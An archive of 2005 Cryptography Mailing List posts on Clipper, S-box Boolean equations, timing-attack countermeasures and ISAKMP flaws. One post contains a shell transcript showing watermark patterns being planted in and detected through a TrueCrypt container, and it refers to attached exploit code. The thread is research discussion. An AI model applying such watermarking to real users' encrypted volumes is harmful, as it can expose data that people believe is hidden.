Re: the effects of a spy
actually justified for cryptosystems: It turned out that, on the key escrow side of the protocol design, the NSA actually fell over the edge, and there was a simple attack (Matt Blaze's work, as I recall). Details on the so-called LEAF blower are here:

http://www.crypto.com/papers/eesproto.pdf

--
http://www.lightconsulting.com/~travis/
"We already have enough fast, insecure systems." -- Schneier & Ferguson
GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
solving, simplification and factorization of boolean equations
Does anyone have any references on how one would go about creating and manipulating the boolean equations that govern symmetric ciphers? I know that most of the time ciphers describe an algorithm, often using tables (S-boxes and E-tables) in lieu of providing equations, and I'm wondering how one goes about generating the equations for each bit of the output.

One thing I've always been curious about is the minimum amount of work (in terms of a primitive boolean gate such as NAND) necessary to compute the output values. Could there be tables derived from equations so cleverly arranged that brute forcing is very simple once you know the original equations, but their exact structure is not evident from the tables themselves?

Once you have some equations, how would you go about simplifying them? I suspect that finding the simplest form is probably NP-hard, but I'm not certain and don't quite know where to start reading on the subject.
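The "generating equations" part of the question is mechanical: each output bit of a table defines a truth table, and its minterms give an (unminimized) sum-of-products equation. A minimal sketch, using a made-up 2-bit S-box for illustration (real cipher S-boxes are wider, but the derivation is the same):

```python
# Derive a sum-of-products (SOP) equation for each output bit of a small
# S-box from its lookup table. The 2-bit S-box below is made up.
SBOX = [0b10, 0b00, 0b11, 0b01]  # 2-bit input -> 2-bit output
IN_BITS = 2

def sop_for_bit(table, out_bit, in_bits):
    """One AND-clause (list of (var, value) literals) per input for which
    the chosen output bit is 1; the OR of the clauses is the SOP equation."""
    clauses = []
    for x in range(2 ** in_bits):
        if (table[x] >> out_bit) & 1:
            clauses.append([(i, (x >> i) & 1) for i in range(in_bits)])
    return clauses

def eval_sop(clauses, x):
    """Evaluate an SOP equation on input x."""
    return int(any(all(((x >> i) & 1) == v for i, v in c) for c in clauses))

# The derived equations reproduce the table bit-for-bit.
for bit in range(2):
    eq = sop_for_bit(SBOX, bit, IN_BITS)
    assert all(eval_sop(eq, x) == (SBOX[x] >> bit) & 1 for x in range(4))
```

This gives the unminimized form; minimizing it (Quine-McCluskey exactly, or heuristics such as Espresso) is where the suspected hardness lives.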
Re: timing attack countermeasures (nonrandom but unpredictable delays)
| In many cases, the observed time depends both on the input and on some
| other random noise. In such cases, averaging attacks that use the same
| input over and over again will continue to work, despite the use of
| a pseudorandom input-dependent delay. For instance, think of a timing
| attack on AES, where the time to compute the map X |--> AES(K,X) depends
| only on K and X, but where the measured time depends on the computation
| time (which might be a deterministic function of K and X) plus the
| network latency (which is random). Indeed, in this example even the
| computation time might not be a deterministic function of K and X: it
| might depend on the state of the cache, which might have some random
| component.

I don't follow; averaging allows one to remove random variables from the overall time, but you're still left with the real computation time plus the deterministic delay I suggested as a function of the input.

Specifically, time t(k,x) = f(k,x) + d(k,x) + r

where r is a random variable modelling all random factors, f is the time to compute the function, and d is the deterministic delay I suggested that is a function of the inputs. Averaging with repeated evaluations of the same k and x allows one to compute the mean value of r, and the sum f+d, but I don't see how that helps one separate f from d. What am I missing?
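The model above can be simulated directly; the constants below are made up, but the simulation shows the point being argued: averaging pins down f+d (given the mean of r) while giving no handle on how f+d splits.

```python
# Numeric sketch of t(k,x) = f(k,x) + d(k,x) + r for one fixed (k,x) pair.
import random

random.seed(1)
f_kx = 130.0   # hypothetical real computation time
d_kx = 45.0    # hypothetical deterministic input-dependent delay

def measure():
    r = random.gauss(10.0, 5.0)   # random latency, mean 10
    return f_kx + d_kx + r

n = 50_000
avg = sum(measure() for _ in range(n)) / n
# Averaging recovers f + d + E[r] = 185; nothing in the samples
# distinguishes (f, d) = (130, 45) from, say, (100, 75).
assert abs(avg - (f_kx + d_kx + 10.0)) < 0.5
```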
Re: gonzo cryptography; how would you improve existing cryptosystems?
Thomas Sjögren wrote:
| On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote:
| | The only thing close that I've seen is Bestcrypt, which is commercial
| | and has a Linux and Windows port. I don't recall if the Linux port
| | came with source or not.
|
| http://www.truecrypt.org/
| TrueCrypt -- free open-source disk encryption software for Windows
| XP/2000/2003 and Linux

Unfortunately, TrueCrypt is just another broken device-crypto implementation that uses good ciphers in an insecure way. Specially crafted static bit patterns are easily detectable through that kind of bad crypto. Requirements: (1) the cipher used must have a 128-bit block size, and (2) the file system where the bit patterns are stored must have a 2K or larger soft block size. Many popular Linux file systems meet those requirements. Uuencoded exploit source code is included in this email.

# truecrypt --device-number 0 --filesystem ext2 /tmp/container1.tc /mnt
Enter password for '/tmp/container1.tc':
# mount | grep /mnt
/dev/mapper/truecrypt0 on /mnt type ext2 (rw)
# tune2fs -l /dev/mapper/truecrypt0 | grep "Block size"
Block size:               4096
# ./create-watermark-encodings-truecrypt 10:44 11:55 12:66 666:77 /mnt/foo1
# truecrypt -d /mnt
# truecrypt -l
truecrypt: Kernel module not loaded
# ./detect-watermark-encodings-truecrypt /tmp/container1.tc
5241344 bytes scanned
watermark encoding 10, count 44
watermark encoding 11, count 55
watermark encoding 12, count 66
watermark encoding 666, count 77
# uname -s -r
Linux 2.6.14.2
# truecrypt --version | head -n 1
truecrypt 4.0

--
Jari Ruusu  1024R/3A220F51 5B 4B F9 BB D3 3F 52 E9  DB 1D EB E3 24 0E A9 DD

[base64-encoded attachment watermark-exploits.tar.bz2 truncated in archive]
Re: ISAKMP flaws?
* Perry E. Metzger:

| I haven't been following the IPSec mailing lists of late -- can anyone
| who knows details explain what the issue is?

These bugs have been uncovered by a PROTOS-style test suite. Such test suites can only reveal missing checks for boundary conditions, leading to out-of-bounds array accesses and things like that. In other words, trivial implementation errors which can be easily avoided using proper programming tools.
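For concreteness, a sketch (in Python, not drawn from any real ISAKMP code) of the class of bug a PROTOS-style suite finds: a length field trusted without comparison against the remaining buffer.

```python
# Parse [type:1][length:1][body:length-2]* records, rejecting out-of-bounds
# lengths instead of reading past the buffer. The record layout is made up;
# the bounds checks marked below are the ones fuzzers find missing.
def parse_payloads(data: bytes):
    payloads, off = [], 0
    while off < len(data):
        if len(data) - off < 2:
            raise ValueError("truncated header")        # boundary check 1
        ptype, plen = data[off], data[off + 1]
        if plen < 2 or off + plen > len(data):
            raise ValueError("bad length field")        # boundary check 2
        payloads.append((ptype, data[off + 2:off + plen]))
        off += plen
    return payloads

assert parse_payloads(b"\x01\x04ab\x02\x02") == [(1, b"ab"), (2, b"")]
for bad in (b"\x01\xff", b"\x01\x01x", b"\x01"):
    try:
        parse_payloads(bad)
        assert False, "should have rejected"
    except ValueError:
        pass
```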
Re: ISAKMP flaws?
Florian Weimer [EMAIL PROTECTED] writes:

| * Perry E. Metzger:
| | I haven't been following the IPSec mailing lists of late -- can anyone
| | who knows details explain what the issue is?
|
| These bugs have been uncovered by a PROTOS-style test suite. Such test
| suites can only reveal missing checks for boundary conditions, leading
| to out-of-bounds array accesses and things like that. In other words,
| trivial implementation errors which can be easily avoided using proper
| programming tools.

I feel a need to comment on statements like this... At several times in the past I've seen people make sweeping generalisations like this: "Everyone knows about this security weakness, this { paper | article | security alert } isn't { novel | interesting | worth publishing }", or some variant thereof (in this case, "these trivial errors are easily avoided"). What makes these statements rather unconvincing is that the majority of all implementations out there make these trivial, easily-avoided errors (or the majority of users aren't aware that the well-known problem in the security alert exists, or whatever).

The nicest example I've seen of this was where the head of a standards working group explained that some obscure feature that implementors had been getting wrong was so obvious that they'd consciously omitted putting it in the standard, because everyone just magically knew about it.

In this particular case, if the problem is so trivial and easily avoided, why does almost every implementation (according to the security advisory) get it wrong?

Peter.
Re: solving, simplification and factorization of boolean equations
Travis,

Have a look at Karnaugh maps, which are a matrix-based Boolean algebra reduction technique. I understand that there are more advanced computational algorithms at this point, but I believe that they build off of the principle of adjacency found in a Karnaugh map matrix.

Best regards,
-- Mike
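A minimal illustration of the adjacency principle mentioned above, using a made-up pair of minterms: two minterms that differ in exactly one variable merge into a single term with that variable eliminated.

```python
# Karnaugh-map adjacency: minterms 0b110 and 0b111 (x=1, y=1, z=either)
# differ only in z, so  x&y&z | x&y&~z  reduces to  x&y.
def differs_in_one_bit(a, b):
    d = a ^ b
    return d != 0 and d & (d - 1) == 0   # exactly one bit set in the XOR

assert differs_in_one_bit(0b110, 0b111)

# Verify the reduction exhaustively over all 3-variable inputs.
for v in range(8):
    x, y, z = (v >> 2) & 1, (v >> 1) & 1, v & 1
    original = int(v in (0b110, 0b111))  # OR of the two minterms
    merged = x & y                       # term with z eliminated
    assert original == merged
```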
Re: timing attack countermeasures (nonrandom but unpredictable delays)
| In many cases, the observed time depends both on the input and on some
| other random noise. In such cases, averaging attacks that use the same
| input over and over again will continue to work, despite the use of
| a pseudorandom input-dependent delay. For instance, think of a timing
| attack on AES, where the time to compute the map X |--> AES(K,X) depends
| only on K and X, but where the measured time depends on the computation
| time (which might be a deterministic function of K and X) plus the
| network latency (which is random). Indeed, in this example even the
| computation time might not be a deterministic function of K and X: it
| might depend on the state of the cache, which might have some random
| component.
|
| I don't follow; averaging allows one to remove random variables from
| the overall time, but you're still left with the real computation time
| plus the deterministic delay I suggested as a function of the input.
|
| Specifically, time t(k,x) = f(k,x) + d(k,x) + r
|
| Where r is a random variable modelling all random factors, f is the
| time to compute the function, and d is the deterministic delay I
| suggested that is a function of the inputs. Averaging with repeated
| evaluations of the same k and x allows one to compute the mean value
| of r, and the sum f+d, but I don't see how that helps one separate f
| from d. What am I missing?

Why do you need to separate f from f+d? The attack is based on a timing variation that is a function of k and x, that's all. Think of it this way: your implementation with the new d(k,x) added in is indistinguishable, in externally visible behavior, from a *different* implementation f'(k,x) which has the undesired property: that the time is a function of the inputs. Any attack that works against such an implementation works against yours.

Now, your model is actually general enough to allow for effective d(k,x)'s. For example, suppose that d(k,x) = C - f(k,x), for some constant C.
Then t(k,x) is just C - i.e., the computation is constant-time. One can generalize this a bit: f(k,x) in any real application isn't going to have a unique value for every possible (k,x) pair (or even for every possible x for fixed k, or k for fixed x). Even if this were true in a theoretical sense, you couldn't possibly measure it finely enough.

The real attack arises because of a combination of things: f(k,x) is actually a function of k and x (or can be made so by averaging); the size of f's range is a significant fraction of the size of the domain of k, x, or (k,x), depending on what you are attacking; and, finally, the inverse images of the elements of f's range are fairly even in size. These all arise because the nature of the attack is to use f(k,x) to determine that k (or x or (k,x)) is actually a member of some subset of the domain of k (or ...), namely, the inverse image of the observed value under f. (The need for the last one can be seen by considering a function f that sends (0,x) to x and every other pair of values to 1. Then it's easy to attack the 0 key by computing the timing, but no information about any other key can be gained by timing attacks.)

If we think of your d() function as a compensation function, then d(k,x) = C - f(k,x) is an ideal compensation function, which it may be impractical to use. (The ideal compensation function is always available *in principle*, because we can set C = max over k,x of f(k,x), compute naturally, then compute d(k,x) by looking at the time elapsed for the function we just finished and delaying for C less than that value.) However, the analysis above shows that there may be other useful compensation functions which, while they can't by their nature provide the degree of security of the ideal compensation function, may still be effective.
For example, suppose I have several different ways to compute the function to be protected, with differing timing characteristics, but it's certain that for no input values do all the calculations take the maximum amount of time. If I run all the algorithms in parallel and deliver the first result that is available, I've reduced the range of f by eliminating some of the largest values. (Of course, one has to get the details right!)

-- Jerry
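The ideal compensation function above can be sketched in abstract cost units rather than wall-clock time (the data-dependent cost function below is made up):

```python
# Sketch of the ideal compensation function d(k,x) = C - f(k,x): pad every
# computation out to the maximum cost C, so timing carries no information.
def f_cost(k, x):
    return 50 + bin(k & x).count("1")  # hypothetical key/input-dependent cost

KEYS, INPUTS = range(16), range(16)
C = max(f_cost(k, x) for k in KEYS for x in INPUTS)

def padded_cost(k, x):
    t = f_cost(k, x)
    return t + (C - t)   # delay for "C less than that value"

# Every (k,x) now takes exactly C: the timing side channel is closed.
assert all(padded_cost(k, x) == C for k in KEYS for x in INPUTS)
```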
Re: timing attack countermeasures (nonrandom but unpredictable delays)
From: Travis H. [EMAIL PROTECTED]
Sent: Nov 16, 2005 11:37 PM
To: David Wagner [EMAIL PROTECTED]
Cc: cryptography@metzdowd.com
Subject: Re: timing attack countermeasures (nonrandom but unpredictable delays)

...
| I don't follow; averaging allows one to remove random variables from
| the overall time, but you're still left with the real computation time
| plus the deterministic delay I suggested as a function of the input.
|
| Specifically, time t(k,x) = f(k,x) + d(k,x) + r
|
| Where r is a random variable modelling all random factors, f is the
| time to compute the function, and d is the deterministic delay I
| suggested that is a function of the inputs. Averaging with repeated
| evaluations of the same k and x allows one to compute the mean value
| of r, and the sum f+d, but I don't see how that helps one separate f
| from d. What am I missing?

Let's assume d(k,x) is a random function of k||x, uniformly distributed between 0 and T, where T is the average time of the encryption. I choose a set of inputs to the cipher x[0,1,2,...,n-1] so that if my guess of some part of k is right, I expect their total timing to be much lower than the average case. I get back Sum(f(k,x[i]) + d(k,x[i]) + r[i]).

Suppose my guess is wrong. Now what we expect is:

a. Sum(f(k,x[i])) = average value
b. Sum(d(k,x[i])) = average value
c. Sum(r[i]) = average value

Suppose my guess is right. Now what we expect is:

a. Sum(f(k,x[i])) = unusually low value
b. Sum(d(k,x[i])) = average value
c. Sum(r[i]) = average value

So, right guesses still give me unusually low values, and wrong guesses still give me average-looking values. That means the timing channel is still there--d(k,x) only adds random noise. The only way to avoid this is to make d(k,x) somehow related to f(k,x). That's the idea behind things like having software or hardware go through both the 0 and 1 case for each bit processed in an exponent. In that case, we get d(k,x) being fast when f(k,x) is slow, and vice versa, and we close the timing channel.
As long as d(k,x) is independent of f(k,x), I can still test guesses of parts of k or parts of x.

--John Kelsey
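The "both the 0 and 1 case for each exponent bit" countermeasure mentioned above is, in sketch form, square-and-multiply-always. A simplified illustration; a hardened implementation would also need a constant-time select rather than the Python `if` below, which itself leaks slightly:

```python
# Square-and-multiply-always modular exponentiation: the multiply is
# performed for every exponent bit, so per-bit work no longer depends on
# the bit's value. nbits is a fixed public bound on the exponent length.
def modexp_always(base, exp, mod, nbits=16):
    acc = 1
    for i in reversed(range(nbits)):
        acc = (acc * acc) % mod
        mult = (acc * base) % mod        # computed for every bit...
        if (exp >> i) & 1:
            acc = mult                   # ...but only kept when the bit is 1
    return acc

assert modexp_always(7, 1234, 10007) == pow(7, 1234, 10007)
assert modexp_always(3, 0, 101) == 1
```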
Re: solving, simplification and factorization...
The answer you are looking for is Karnaugh logic maps. This will produce an unoptimized set of gate logic that represents, say, S-boxes or E-tables. From there you can find smaller gate-logic complements that produce the same logic map.

Christopher Abad and I researched this heavily a few years ago regarding DES S-boxes. He has provided his gate-logic reduction code on his site, http://www.the-mathclub.net. I can send you my generic gate-logic optimizer if you'd like. I have one for standard (&,|,^,~), mmx/sse2 (&,|,^,~,&~), and vhdl/verilog (&,|,^,~,~&,~|,~^).

Anyhow, best of luck.

-Patrick Stach
Re: ISAKMP flaws?
At 11:20 AM +0100 11/17/05, Florian Weimer wrote:

| These bugs have been uncovered by a PROTOS-style test suite. Such test
| suites can only reveal missing checks for boundary conditions, leading
| to out-of-bounds array accesses and things like that. In other words,
| trivial implementation errors which can be easily avoided using proper
| programming tools.

Which proper programming tools would check for a logic-path failure when a crafted packet includes Subpacket A, which is only supposed to be there when Subpacket B is there, but the packet doesn't include Subpacket B? There are no programming tools that check for this, or for related issues: it has to be the implementer who has enough understanding of the protocol and enough time (and program space) to code against such issues. Throw in PKIX certificates in certificate chains, and it gets much worse.

IKE is a very complicated protocol with many within-packet and within-stream dependencies. These cannot be resolved by proper programming tools unless those tools are specifically crafted for IKE. SSL/TLS probably suffers the same fate.

--Paul Hoffman, Director
--VPN Consortium
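The within-packet dependency described above has to be enforced by protocol-aware code after generic parsing succeeds. A sketch with a hypothetical rule table (the subpacket types and rules below are made up, not real ISAKMP):

```python
# Cross-subpacket dependency check: subpacket "A" is only valid when
# subpacket "B" is also present in the same packet. No generic tool knows
# this rule; it must be encoded by someone who understands the protocol.
DEPENDS_ON = {"A": "B"}   # hypothetical rule table

def check_dependencies(subpackets):
    present = {sp["type"] for sp in subpackets}
    for sp in subpackets:
        needed = DEPENDS_ON.get(sp["type"])
        if needed is not None and needed not in present:
            raise ValueError(f"subpacket {sp['type']} requires {needed}")

check_dependencies([{"type": "A"}, {"type": "B"}])   # ok: A with B
try:
    check_dependencies([{"type": "A"}])              # crafted packet: A alone
    assert False, "should have rejected A without B"
except ValueError:
    pass
```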
Re: the effects of a spy
From: [EMAIL PROTECTED]
Sent: Nov 16, 2005 12:26 PM
Subject: Re: the effects of a spy

...
| Remember Clipper? It had an NSA-designed 80-bit encryption algorithm.
| One interesting fact about it was that it appeared to be very
| aggressively designed. Most published algorithms will, for example, use
| (say) 5 rounds beyond the point where differential cryptanalysis stops
| giving you an advantage. Clipper, on the other hand, falls to
| differential cryptanalysis if you use even one less round than the
| specification calls for.

Nitpick: the system was Clipper; the algorithm was Skipjack.

| Why the NSA would design something so close to the edge has always been
| a bit of a mystery (well, to me anyway). One interpretation is that NSA
| simply has a deeper understanding than outsiders of where the limits
| really are. What to us looks like aggressive design, to them is
| reasonable and even conservative.

Three comments here:

a. Maybe they really do have a good generic differential-probability-limiting algorithm. There are algorithms like this in the public world (they can be really computationally expensive, and they only tell you upper bounds on a subset of possible attacks), and you'd expect NSA to be interested, since they design a lot of algorithms. It's not so intuitive to me that this would have applied to impossible differentials unless they designed it to, though. In that case, you're looking at differentials that can't appear instead of differentials that appear too often.

b. Maybe they don't care that much about attacks that require some huge number of plaintexts. The academic world has defined the game in terms of total work being the critical parameter in the attack, and we're seeing a push over time to move that to total attack cost. (That is, it's not so interesting if you have a 2^{100} attack on a 128-bit block cipher, if the attack is impossible to parallelize.)
If someone publishes an attack on Twofish tomorrow which requires 2^{96} plaintexts to break it faster than brute force, we'll all agree that's an attack. But there's no reason NSA has to think that way--maybe they have some other parameter, like 2^{n/2} texts for n-bit block ciphers, after which they don't care about attacks because they're not practical.

c. Maybe they just got it wrong. SHA0 and SHA1 demonstrate that this is all too possible. (It's quite plausible to me that they have very good tools for analyzing block ciphers, but that they aren't or weren't sure how to best apply them to hash functions.)

| ... Or maybe ... the reasoning Perry mentions above applies here. Any
| time you field a system, there is a possibility that your opponents
| will get hold of it. In the case of Clipper, where the algorithm was
| intended to be published, there's no possibility about it. So why make
| it any stronger than you have to?
| -- Jerry

Reducing Skipjack to 31 rounds wouldn't make a practical trapdoor appear! You're still talking about 2^{34} chosen plaintexts!

--John Kelsey
Re: ISAKMP flaws?
Paul Hoffman wrote:

| At 2:29 PM -0500 11/15/05, Steven M. Bellovin wrote:
| | I mostly agree with you, with one caveat: the complexity of a spec can
| | lead to buggier implementations.
|
| Well, then we fully agree with each other. Look at the message formats
| used in the protocols they have attacked successfully so far.

Humorously, security folks seem to have ignored this when designing our protocols.

Later, Peter Gutmann wrote:

| In this particular case, if the problem is so trivial and easily
| avoided, why does almost every implementation (according to the
| security advisory) get it wrong?

Quoting draft-simpson-danger-isakmp-01.txt, published (after being blocked by the IETF for years) as http://www.usenix.org/publications/login/1999-12/features/harmful.html :

  A great many of the problematic specifications are due to the ISAKMP framework. This is not surprising, as the early drafts used ASN.1, and were fairly clearly ISO inspired. The observations of another ISO implementor (and security analyst) appear applicable:

    The specification was so general, and left so many choices, that it was necessary to hold implementor workshops to agree on what subsets to build and what choices to make. The specification wasn't a specification of a protocol. Instead, it was a framework in which a protocol could be designed and implemented. [Folklore-00]

  [Folklore-00] Perlman, R., "Folklore of Protocol Design", draft-iab-perlman-folklore-00.txt, Work In Progress, January 1998.

Quoting "Photuris: Design Criteria", LNCS, Springer-Verlag, 1999:

  The hallmark of successful Internet protocols is that they are relatively simple. This aids in analysis of the protocol design, improves implementation interoperability, and reduces operational considerations.
Compare with Photuris [RFC-2522], where undergraduate (Keromytis) and graduate (Spatscheck, Provos) students independently were able to complete interoperable implementations (in their spare time) in a month or so.

So, no, some security folks didn't ignore this ;-)
--
William Allen Simpson
    Key fingerprint =  17 40 5E 67 15 6F 31 26  DD 0D B9 9B 6A 15 2C 32